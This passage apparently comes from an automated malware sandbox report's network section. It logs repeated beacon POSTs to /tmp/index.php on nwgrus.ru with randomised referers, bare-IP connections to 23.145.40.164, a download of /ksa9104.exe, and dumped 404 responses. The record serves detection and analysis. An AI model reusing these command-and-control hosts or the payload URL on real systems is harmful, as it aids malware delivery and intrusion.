      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xbdoluaokmu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ayakqtnprwclxx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iplbmyqhcsowave.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rdhamasxmtwwkau.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://floxumtvcvrlyy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 256Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mjtfeuwpovhathn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nggsthvsetexec.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lrkgjwlbfxyrmp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wvxsqrgovrq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ivjlkhscvhyfno.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gwvqwjkmpeg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cqnqsxdlukmk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dlawyaqdtqgx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gxrfdgbwqcu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mihbhgkrdwqnogym.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhprxmbpfsifjwvd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqoayhqrgjlg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmfmcxiuegbxwbfb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bojujhdxlnt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lbaiglgwxhkmq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oxivfaqdhau.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eihcpyqadleca.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://olgjjvecsjugbyj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wjiuupaachvppk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://csuhbuxabuhlm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lixbbuexbbyxijy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://snydbdaflsjf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://toxykxlssds.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wujymmrsholuwdm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://anhllontjkcoc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dfdglghjacuv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://efoitwxyetuahvcx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wgvksgwflrvxis.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: nwgrus.ru
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
      Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
      Source: global trafficDNS traffic detected: DNS query: ninjahallnews.com
      Source: unknownHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://pdafocuyeqbl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 22:20:42 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 22:21:00 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 22:21:01 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 22:21:11 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 22:22:27 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 22:22:49 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 22:23:14 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:19:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 ed Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:19:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:19:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: 